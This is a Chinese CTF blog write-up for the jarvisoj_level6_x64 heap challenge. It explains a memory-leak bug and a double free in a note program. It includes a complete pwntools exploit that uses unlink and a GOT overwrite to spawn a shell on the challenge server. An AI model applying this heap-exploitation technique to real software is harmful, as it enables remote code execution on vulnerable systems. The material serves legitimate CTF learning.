jarvisoj_level6_x64(buuctf)--unlink利用

最新推荐文章于 2022-12-28 17:06:36 发布
最新推荐文章于 2022-12-28 17:06:36 发布
阅读量680 收藏 3
点赞数
分类专栏: heap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45427676/article/details/105495608
版权

这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识

查看保护机制
在这里插入图片描述

程序分析

在IDA查看一下主函数
在这里插入图片描述
可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。

1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区的指针(看后面分析就知道各条记录都malloc了一个堆来保存)。

2、sub_400998:就是让你输入一个操作选项,没什么好说的,这里没有漏洞可以利用。

3、sub_400bc2:新建记录,进去以后的具体实现就是,让你输入记录内容长度和记录内容,然后检查长度有没有超最大限制,正常就malloc一个存储这条记录的堆块,然后以你输入的长度为标准一个一个把记录内容读进这个堆块。注意malloc堆块时有这样一个操作:
在这里插入图片描述
这表示分配堆块的大小是0x80的整数倍。最后就是把这条记录的有关信息写进索引表;

4、sub_400b14:输出功能,遍历索引表,打印所有记录的标号和记录内容,标号从0开始。

5、sub_400d87:编辑功能,依据上述记录标号找到相应记录,然后edit。

6、sub_400f7d:删除功能,仍旧依据上述标号找到相应记录,然后重置其索引表为未使用态,并free掉对应的记录堆块。

索引表数据结构:
在这里插入图片描述
head不用管,是索引表大堆块的块首,不属于用户区;

max_size表示能存储的最大的记录数量,exist_num表示已有的记录个数;

再往后就是每三个数据构成一个索引项,索引项的结构体的三个数据分别代表:0/1是指该项有无记录引用,0是没有,1是有记录,size_user是记录的长度,ptr_heap是存储记录的堆块的用户区指针。

漏洞

1、新建记录函数中实现读入记录内容的子函数里面存在漏洞,正常情况下长度为n的字符串,是有包含’x00’结束符在内的n+1个ascii,但是这里并没有把结束符读进来,少了结束符,在打印记录时就不会正确的停下来,也就可以实现内存泄露!

内存泄露用于结合偏移计算heap_base以及system地址。
在这里插入图片描述
2、double free漏洞
在这里插入图片描述
输入一个标号后,程序并没有检查索引表中标号位置的索引项的第一个成员变量是否已经为0、也没有检查对应索引项的堆指针成员变量指向的堆内存是否已经被free,也就是说,即使这个索引项已经删过记录了,你还可以再删它一次,再像没事儿人一样对ptr_heap再进行一次free,而在程序代码中,free之后并没有将对应堆指针置空,这就对同一堆块free了两次,造成了double free漏洞!

思路

添加四个Note
释放note[0]和note[2],此时note[0]的bk指向note[2]的chunk,note[2]的bk指向main_arena+0x58(两个chunk都进入unsorted bin)
再次添加2个note,payload长度为8,注意结尾不要是\x00
利用list泄露NOTE管理块的地址和libc基地址
将四个note全部删除
添加一个note,长度要能包含进最开始的3个note的chunk
伪造一个chunk,大小为0x80,fd为note[0]-0x18, bk为note[0]-0x10,利用unlink把NOTE管理块中note[0]的地址改为note[0]-0x18
把note]0]改为atoi的got,然后编辑note[0],改为system地址
输入/bin/sh,获取shell

先申请4个chunk,然后free(0)和free(2),防止合并;然后在申请2个chunk,只写入8字节,就可以leak出heap和libc的基地址;
在heap基地址偏移0x30的地方有我们需要的NOTE管理块的地址
在这里插入图片描述

exp:



#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

import sys

context.log_level = 'debug'

if sys.argv[0]=="l":

	p=process('./freenote')

	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

else:

	p=remote('node3.buuoj.cn',28843)

	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')



e=ELF('./freenote')

def List():

	p.recvuntil('Your choice: ')

	p.sendline('1')


def new(cont):

	p.recvuntil('Your choice: ')

	p.sendline('2')

	p.recvuntil('Length of new note: ')

	p.sendline(str(len(cont)))

	p.recvuntil('Enter your note: ')

	p.sendline(cont)



def edit(num,cont):

	p.recvuntil('Your choice: ')

	p.sendline('3')

	p.recvuntil('Note number: ')

	p.sendline(str(num))

	p.recvuntil('Length of note: ')

	p.sendline(str(len(cont)))

	p.recvuntil('Enter your note: ')

	p.sendline(cont)



def delete(num):

	p.recvuntil('Your choice: ')

	p.sendline('4')

	p.recvuntil('Note number: ')

	p.sendline(str(num))



new('a'*0x80)

new('b'*0x80)

new('c'*0x80)

new('d'*0x80)



delete(0)

delete(2)

new('11111111')

new('22222222')

List()

p.recvuntil('11111111')

s=p.recvuntil('\x0a')

chunk2=u64(s[:-1].ljust(8,'\x00'))

heap_addr=chunk2-0x1940

point_chunk0=heap_addr+0x30

print hex(heap_addr)



delete(1)

delete(2)

delete(3)



#unlink

payload = p64(0x90)+p64(0x81)+p64(point_chunk0-0x18)+p64(point_chunk0-0x10) 

payload +='a'*0x60

payload += p64(0x80)+p64(0x90)

payload +='c'*0x80+p64(0x90)+p64(0x121)

edit(0,payload)

delete(1)





#free_got->system

free_got_addr=e.got['free']

print hex(free_got_addr)

payload2=p64(4)+p64(1)+p64(0x8)+p64(free_got_addr)

payload2+=p64(1)+p64(0x8)+p64(chunk2)

payload2+=p64(1)+p64(0x8)+p64(e.got['atoi'])

payload2+='\x00'*(0x120-80)

edit(0,payload2)



p.recvuntil('Your choice: Invalid!\n')



List()

p.recvuntil('2. ')

atoi_in_server=u64(p.recvuntil('\x0a')[:-1].ljust(8,'\x00'))

system_in_server=libc.symbols['system']+atoi_in_server-libc.symbols['atoi']

#gdb.attach(proc.pidof(p)[0])



payload3=p64(system_in_server)

edit(0,payload3)

edit(1,"/bin/sh\x00")

delete(1)



p.interactive()
exp解释

chunk2_bk – 88 = main_arena ,chunk2_bk – 88 – main_arena= libc_base ,其中main_arena = 0x3be760 .

那么 chunk0_bk 减的 0x1940 是怎么得到的呢?heap_base应该是main函数执行后程序分配到的第一个堆的基地址,而程序分配的第一个堆是索引表,IDA结合f5可以看到索引表堆块用户区大小是0x1810,索引表堆块的head占0x10,因此索引表堆块whole_size=0x1820;chunk0_bk指向的是chunk2,索引表堆块和chunk2之间隔了一个chunk0加一个chunk1,因此这块间隔的大小就是(0x10+0x80)*2=0x120;因此chunk0_bk所指向的位置到heap_base的总偏移量就等于0x1820+0x120=0x1940.

参考1:大佬文章
参考2:大佬文章
参考3:大佬文章

夜行猫
关注
专栏目录
level6(Jarvis OJ)
weixin_43868725的博客
06-17 363
0x0 程序保护和流程 保护: 流程: main() init_note_pointer() 在note_pointer处存放note的信息,note_pointer[0]代表最多存放256个note,note_pointer[1]代表当前的note数量。 选择1会输出全部的note,选择2会新建一个note,结构为 { flag; //1代表正在使用,反之为0 length; //note的长度 note_pointer; //执行note的指针 } 选择3可以修改note的长度和内
BUUCTF-PWN刷题记录-14
weixin_44145820的博客
04-29 814
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这题原题目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这题应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
jarvisoj_level6_x64
z1r0的博客
03-13 674
jarvisoj_level6_x64 查看保护 这一类保护的堆题基本上就是申请到堆控制的地址,改got表 进ida直接奔delete这里去了,一枚uaf 第二个漏洞在这里edit可以申请size 攻击思路:这一题可以看到堆的size和是否释放都放在了一个地方,看了一下保护就可以知道大概的思路了。申请到管理堆的地方,然后填充入got表输出libc,改got为system。 注意:这里申请的是unstroted bin大小的堆块!!! 1.首先肯定是先要泄露libc,这一题可以使用unlink来解决,一
jarvisoj)(pwn)guestbook2/level6_x64
PLpa的博客
08-28 1137
guestbook2和level6_x64真的是一摸一样的,两个题目除了提示文字不同,其他的漏洞根本一样,鉴于jarvisoj中的pwn服务器比pwn2服务器要稳定一点,所以这里就写guestbook2。 前言: 这里,我提供两种方法解题,一种是利用unlink的任意地址读写功能泄露libc基址,一种是用unsorted bin和use after free来泄露libc基址,两种方法都行。 漏洞...
jarvis oj level6
发蝴蝶和大脑斧的博客
01-10 1200
原来的附件有点问题,重新发过了. 主要用了两个技术:1.溢出泄露libc地址,heap地址.2.unsafe_unlink,这个how2pwn上unsafe_unlink.c里写的很清楚. 首先看泄露libc地址 New("A"*0x80)#0 New("B"*0x80)#1 Delete(0) New("123") List() c=p.recvuntil('AAAA') leak_addr=u...
redis-6.2.4-x64-windows-bin.zip
06-15
修复 UNLINK 在 deleted consumer groups 的 stream key 上的崩溃( #8932 ) SINTERSTORE:当不存在任何 sources 时添加丢失的 keyspace del 事件 ( #8949 ) Sentinel:修复空字符串 sentinel-user/sentinel-pass ...
redis-6.0.7-x64-for-windows-bin.zip
09-03
stream 类型密钥的 UNLINK/Lazyfree 永远不会进行异步释放。 PERSIST 应该使 WATCH 无效(就像 EXPIRE 一样) 只有 read 命令的 EXEC 可能在 OOM 时被拒绝。 TLS:放宽对 CONFIG SET 的验证(如果设置了某些配置并且...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2100
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 438
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
jarvis guestbook2 / level6_x64
发蝴蝶和大脑斧的博客
03-12 858
level6思路相同,只是在x64运行。 遇到几个问题: 1.[DEBUG] Received 0x4e bytes: "*** Error in guestbook2: realloc(): invalid pointer: 0x0000000001dcb018 ***\n" 调试了半天发现是当新块的大小与原来不一致时都会调用realloc,所以要填充的时候要仔细。 2.原本想这样泄漏libc...
jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 454
Unlink!Unlink!Unlinklevel6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.csdn.net/weixin_41617275/article...
jarvis level6_x64堆溢出unlink拾遗
weixin_30274627的博客
11-16 187
level6 32位的我没有调出来,貌似32位的堆结构和64位不太一样,嘤嘤嘤?,所以做了一下这个64位的,题目地址,level6_x64 首先看一下程序的结构体 struct list //0x1810 { int all=256; int now_sum; struct _note *note; } struct _note { ...
jarvisoj(level6)--unlink
九层台
09-21 1601
unlink其实就是把chunk从bin链中拉出来然后跟前面或者后面的chunk合并。 参考https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/unlink/。 则当我们free(Q)时 glibc 判断这个块是 small chunk。 判断前向合并,发现前一个 chunk 处于使用状态,不需要前向合并。 判断后向合并,发现后一个 chunk ...
【buuoj】zctf_2016_note31 (unlink实现libc泄露)
qq_42220888的博客
12-28 157
zctf_2016_note3 1
[BUUOJ刷题记录]hitcon2014_stkof 一道Unlink例题
zylxixixi的博客
10-01 322
check一下开启的安全防护,并没有开启PIE 拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。 allocate函数创建一个自定义大小的堆 edit函数自定大小修改堆块的内容,容易产生堆溢出 delete函数就是free堆块 还有一个没有意义的函数 这里比较重要的点是存储堆块地址的数组地址 整体思路为: 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10 一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用s...
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1753
考完试了,又开始做题 这题是一道很好的用来熟悉堆的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的堆是否有free 2. delete完之后没有把指向堆的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html
buuctf hitcon_training,axb_2019_heap,unlink一般利用方法总结
weixin_46521144的博客
07-10 215
两道都是使用了unlink 并且两道题的方法一模一样,和上一篇的ZCTF的一道题也一样 使用unlink的题目一般有这样的特征 指针位置泄露(这三道题全都是在bss上的指针) 存在off-by-one或者off-by-null以及其他溢出修改漏洞 第一条用于控制unlink堆块的检验,第二条用于激活unlink,两者缺一不可。 利用方法: 制造unlink块,修改fd为ptr-0x18,bk为ptr-0x10,构造chunk_head和下一个chunk的prev_size,通过off修改下一个chun
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 917
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
dentry_unlink_inode
最新发布
05-23
`dentry_unlink_inode()` 是 Linux 内核中用于删除目录项(dentry)并解除其与 inode 之间关联的函数。在文件系统中,每个文件或目录都对应一个 inode,而目录项则是将文件名映射到相应的 inode 上的结构。当删除一个文件或目录时,需要同时删除其对应的目录项并解除与相应的 inode 的关联,这就是 `dentry_unlink_inode()` 函数的作用。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值